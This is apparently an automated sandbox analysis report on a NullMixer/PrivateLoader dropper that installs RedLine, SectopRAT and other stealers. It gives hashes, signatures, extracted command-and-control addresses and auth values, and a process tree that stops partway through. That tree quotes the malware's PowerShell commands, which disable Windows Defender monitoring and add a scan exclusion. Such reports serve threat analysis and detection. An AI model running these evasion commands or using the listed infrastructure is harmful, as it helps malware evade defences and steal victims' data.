Overview
overview
10Static
static
10022e3c30a1...66.exe
windows7-x64
6022e3c30a1...66.exe
windows10-2004-x64
64d27dca0a1...ef.exe
windows7-x64
104d27dca0a1...ef.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10578a3a7a2b...b3.exe
windows7-x64
10578a3a7a2b...b3.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
109c4880a98c...82.exe
windows7-x64
109c4880a98c...82.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10a1dad4a83d...c4.exe
windows7-x64
10a1dad4a83d...c4.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10acf1b7d80f...e0.exe
windows7-x64
10acf1b7d80f...e0.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10cbf31d825a...d2.exe
windows7-x64
10cbf31d825a...d2.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10db76a117db...12.exe
windows7-x64
10db76a117db...12.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10e2ffb8aeeb...f6.exe
windows7-x64
10e2ffb8aeeb...f6.exe
windows10-2004-x64
7Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 18:26
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
setup_installer.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
setup_installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
setup_installer.exe
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-20240729-en
Behavioral task
behavioral16
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
setup_installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
setup_installer.exe
Resource
win7-20241023-en
Behavioral task
behavioral22
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
setup_installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
setup_installer.exe
Resource
win7-20240729-en
Behavioral task
behavioral30
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10v2004-20241007-en
General
-
Target
setup_installer.exe
-
Size
3.6MB
-
MD5
7f612c816e43e7cae4cbed9173244e73
-
SHA1
661086e8715248a4bd2b7bc1d92149dd11bbe119
-
SHA256
60e9b75ce4e3333d37a1b44348d3f9ae57bbab2130af8d0a44d8a5b09ce9f3bd
-
SHA512
24119a2526654c2783a65fbee9f53c104af2d91dafb0ccab9c6d40adecceffdcfddc34231131bff3eb92f64af61e6e4c700f7135df183bbefa42f4987f06761f
-
SSDEEP
98304:xnCvLUBsgrwO6kbk+hpPKt6ab8ffbpSb8dMLZXeaX8wH:xELUCgr76kbFdbptcZOc/
Malware Config
Extracted
nullmixer
http://marianu.xyz/
Extracted
privateloader
http://45.133.1.107/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
51.178.186.149
Extracted
redline
media20
91.121.67.60:2151
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Extracted
redline
fucker2
135.181.129.119:4805
-
auth_value
b69102cdbd4afe2d3159f88fb6dac731
Extracted
redline
Chris
194.104.136.5:46013
-
auth_value
9491a1c5e11eb6097e68a4fa8627fda8
Extracted
gcleaner
gcl-gb.biz
45.9.20.13
Signatures
-
Detect Fabookie payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\Wed1217e6a0ef74ed.exe family_fabookie -
Fabookie family
-
Gcleaner family
-
Nullmixer family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 15 IoCs
Processes:
resource yara_rule behavioral13/memory/2768-224-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2768-222-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2768-221-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2996-219-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2828-218-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2768-216-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2768-200-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2996-212-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2996-207-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2828-201-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2828-199-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2828-194-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2828-191-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2996-213-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral13/memory/2996-209-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 15 IoCs
Processes:
resource yara_rule behavioral13/memory/2768-224-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2768-222-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2768-221-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2996-219-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2828-218-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2768-216-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2768-200-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2996-212-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2996-207-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2828-201-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2828-199-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2828-194-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2828-191-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2996-213-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral13/memory/2996-209-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
Sectoprat family
-
OnlyLogger payload 2 IoCs
Processes:
resource yara_rule behavioral13/memory/1788-226-0x0000000000400000-0x0000000002DC2000-memory.dmp family_onlylogger behavioral13/memory/1788-230-0x0000000000400000-0x0000000002DC2000-memory.dmp family_onlylogger -
Processes:
powershell.exepowershell.exepid process 1056 powershell.exe 1300 powershell.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8B7E8A07\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\libstdc++-6.dll aspack_v212_v242 -
Executes dropped EXE 21 IoCs
Processes:
setup_install.exeWed128c2773227671b3f.exeWed12fb2a5c52f05816.exeWed126ca6605dbec0399.exeWed1217e6a0ef74ed.exeWed12bcd18bdbc441.exeWed12ebaf7883e1890d.exeWed12fbb08f1dfc28.exeWed12859e3c1cf63b6a0.exeWed1229427acd4bc167.exeWed129eb9b8859.exeWed120b6f5c6d562.exeWed1241cc206cfb.exeWed121f7e9e92793cf.exeWed120b6f5c6d562.tmpVAKlCUnlQu.exeWed120b6f5c6d562.exeWed120b6f5c6d562.tmpWed121f7e9e92793cf.exeWed128c2773227671b3f.exeWed12859e3c1cf63b6a0.exepid process 2620 setup_install.exe 1240 Wed128c2773227671b3f.exe 2956 Wed12fb2a5c52f05816.exe 1788 Wed126ca6605dbec0399.exe 2008 Wed1217e6a0ef74ed.exe 1912 Wed12bcd18bdbc441.exe 3008 Wed12ebaf7883e1890d.exe 524 Wed12fbb08f1dfc28.exe 2236 Wed12859e3c1cf63b6a0.exe 2468 Wed1229427acd4bc167.exe 2432 Wed129eb9b8859.exe 2140 Wed120b6f5c6d562.exe 1988 Wed1241cc206cfb.exe 2004 Wed121f7e9e92793cf.exe 1552 Wed120b6f5c6d562.tmp 772 VAKlCUnlQu.exe 2312 Wed120b6f5c6d562.exe 1548 Wed120b6f5c6d562.tmp 2828 Wed121f7e9e92793cf.exe 2996 Wed128c2773227671b3f.exe 2768 Wed12859e3c1cf63b6a0.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_installer.exesetup_install.execmd.execmd.exeWed12fb2a5c52f05816.exeWed128c2773227671b3f.execmd.execmd.exeWed126ca6605dbec0399.execmd.exeWed12bcd18bdbc441.execmd.execmd.execmd.execmd.exeWed12fbb08f1dfc28.execmd.execmd.exeWed12859e3c1cf63b6a0.execmd.exeWed1229427acd4bc167.exeWed129eb9b8859.execmd.exeWed120b6f5c6d562.exeWed1241cc206cfb.exeWed121f7e9e92793cf.exeWerFault.exeWed120b6f5c6d562.tmpcmd.exeVAKlCUnlQu.exeWed120b6f5c6d562.exepid process 1976 setup_installer.exe 1976 setup_installer.exe 1976 setup_installer.exe 2620 setup_install.exe 2620 setup_install.exe 2620 setup_install.exe 2620 setup_install.exe 2620 setup_install.exe 2620 setup_install.exe 2620 setup_install.exe 2620 setup_install.exe 1648 cmd.exe 1648 cmd.exe 1476 cmd.exe 2956 Wed12fb2a5c52f05816.exe 2956 Wed12fb2a5c52f05816.exe 1240 Wed128c2773227671b3f.exe 1240 Wed128c2773227671b3f.exe 2596 cmd.exe 2596 cmd.exe 1676 cmd.exe 1788 Wed126ca6605dbec0399.exe 1788 Wed126ca6605dbec0399.exe 628 cmd.exe 1912 Wed12bcd18bdbc441.exe 1912 Wed12bcd18bdbc441.exe 1936 cmd.exe 1500 cmd.exe 1936 cmd.exe 636 cmd.exe 1028 cmd.exe 524 Wed12fbb08f1dfc28.exe 524 Wed12fbb08f1dfc28.exe 568 cmd.exe 568 cmd.exe 1804 cmd.exe 2236 Wed12859e3c1cf63b6a0.exe 2236 Wed12859e3c1cf63b6a0.exe 1908 cmd.exe 2468 Wed1229427acd4bc167.exe 2432 Wed129eb9b8859.exe 2468 Wed1229427acd4bc167.exe 2432 Wed129eb9b8859.exe 2344 cmd.exe 2344 cmd.exe 2140 Wed120b6f5c6d562.exe 2140 Wed120b6f5c6d562.exe 1988 Wed1241cc206cfb.exe 1988 Wed1241cc206cfb.exe 2004 Wed121f7e9e92793cf.exe 2004 Wed121f7e9e92793cf.exe 2140 Wed120b6f5c6d562.exe 2268 WerFault.exe 2268 WerFault.exe 1552 Wed120b6f5c6d562.tmp 1552 Wed120b6f5c6d562.tmp 2112 cmd.exe 1552 Wed120b6f5c6d562.tmp 772 VAKlCUnlQu.exe 772 VAKlCUnlQu.exe 1552 Wed120b6f5c6d562.tmp 2312 Wed120b6f5c6d562.exe 2312 Wed120b6f5c6d562.exe 2268 WerFault.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
Processes:
flow ioc 30 pastebin.com 31 pastebin.com 32 pastebin.com 33 pastebin.com 39 iplogger.org 40 iplogger.org 41 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Wed121f7e9e92793cf.exeWed128c2773227671b3f.exeWed12859e3c1cf63b6a0.exedescription pid process target process PID 2004 set thread context of 2828 2004 Wed121f7e9e92793cf.exe Wed121f7e9e92793cf.exe PID 1240 set thread context of 2996 1240 Wed128c2773227671b3f.exe Wed128c2773227671b3f.exe PID 2236 set thread context of 2768 2236 Wed12859e3c1cf63b6a0.exe Wed12859e3c1cf63b6a0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process 2268 524 WerFault.exe 1504 2620 WerFault.exe setup_install.exe -
System Location Discovery: System Language Discovery 1 TTPs 47 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Wed1229427acd4bc167.exeWed120b6f5c6d562.execmd.exepowershell.exepowershell.execmd.execmd.exeWed12fbb08f1dfc28.exeVAKlCUnlQu.exeWed128c2773227671b3f.execmd.exemsiexec.execmd.exeWed129eb9b8859.exeWed1241cc206cfb.exeWed121f7e9e92793cf.exetaskkill.exeWed120b6f5c6d562.execmd.execmd.exeWed120b6f5c6d562.tmpWed12859e3c1cf63b6a0.exeWed128c2773227671b3f.execmd.execmd.exemshta.execmd.exesetup_install.execmd.execmd.exeWed120b6f5c6d562.tmpWed121f7e9e92793cf.exeWed12fb2a5c52f05816.execmd.execmd.exesetup_installer.execmd.execmd.execmd.execmd.exemshta.execmd.exeWed126ca6605dbec0399.exeWed12bcd18bdbc441.execmd.exemshta.exeWed12859e3c1cf63b6a0.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed1229427acd4bc167.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed120b6f5c6d562.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed12fbb08f1dfc28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VAKlCUnlQu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed128c2773227671b3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed129eb9b8859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed1241cc206cfb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed121f7e9e92793cf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed120b6f5c6d562.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed120b6f5c6d562.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed12859e3c1cf63b6a0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed128c2773227671b3f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed120b6f5c6d562.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed121f7e9e92793cf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed12fb2a5c52f05816.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed126ca6605dbec0399.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed12bcd18bdbc441.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Wed12859e3c1cf63b6a0.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1556 taskkill.exe -
Processes:
mshta.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1056 powershell.exe 1300 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
Wed120b6f5c6d562.tmpWed126ca6605dbec0399.exepid process 1548 Wed120b6f5c6d562.tmp 1788 Wed126ca6605dbec0399.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exepowershell.exepowershell.exeWed1241cc206cfb.exeWed12ebaf7883e1890d.exedescription pid process Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 1988 Wed1241cc206cfb.exe Token: SeDebugPrivilege 3008 Wed12ebaf7883e1890d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_installer.exesetup_install.execmd.execmd.execmd.exedescription pid process target process PID 1976 wrote to memory of 2620 1976 setup_installer.exe setup_install.exe PID 1976 wrote to memory of 2620 1976 setup_installer.exe setup_install.exe PID 1976 wrote to memory of 2620 1976 setup_installer.exe setup_install.exe PID 1976 wrote to memory of 2620 1976 setup_installer.exe setup_install.exe PID 1976 wrote to memory of 2620 1976 setup_installer.exe setup_install.exe PID 1976 wrote to memory of 2620 1976 setup_installer.exe setup_install.exe PID 1976 wrote to memory of 2620 1976 setup_installer.exe setup_install.exe PID 2620 wrote to memory of 1940 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1940 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1940 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1940 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1940 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1940 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1940 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2452 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2452 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2452 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2452 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2452 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2452 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2452 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1648 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1648 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1648 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1648 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1648 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1648 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1648 2620 setup_install.exe cmd.exe PID 2452 wrote to memory of 1300 2452 cmd.exe powershell.exe PID 2452 wrote to memory of 1300 2452 cmd.exe powershell.exe PID 2452 wrote to memory of 1300 2452 cmd.exe powershell.exe PID 2452 wrote to memory of 1300 2452 cmd.exe powershell.exe PID 2452 wrote to memory of 1300 2452 cmd.exe powershell.exe PID 2452 wrote to memory of 1300 2452 cmd.exe powershell.exe PID 2452 wrote to memory of 1300 2452 cmd.exe powershell.exe PID 1940 wrote to memory of 1056 1940 cmd.exe powershell.exe PID 1940 wrote to memory of 1056 1940 cmd.exe powershell.exe PID 1940 wrote to memory of 1056 1940 cmd.exe powershell.exe PID 1940 wrote to memory of 1056 1940 cmd.exe powershell.exe PID 1940 wrote to memory of 1056 1940 cmd.exe powershell.exe PID 1940 wrote to memory of 1056 1940 cmd.exe powershell.exe PID 1940 wrote to memory of 1056 1940 cmd.exe powershell.exe PID 2620 wrote to memory of 1476 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1476 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1476 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1476 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1476 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1476 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1476 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2596 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2596 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2596 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2596 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2596 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2596 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 2596 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1676 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1676 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1676 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1676 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1676 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1676 2620 setup_install.exe cmd.exe PID 2620 wrote to memory of 1676 2620 setup_install.exe cmd.exe PID 1648 wrote to memory of 1240 1648 cmd.exe Wed128c2773227671b3f.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed128c2773227671b3f.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\Wed128c2773227671b3f.exeWed128c2773227671b3f.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\Wed128c2773227671b3f.exeC:\Users\Admin\AppData\Local\Temp\7zS8B7E8A07\Wed128c2773227671b3f.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2996
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12fb2a5c52f05816.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1476 -
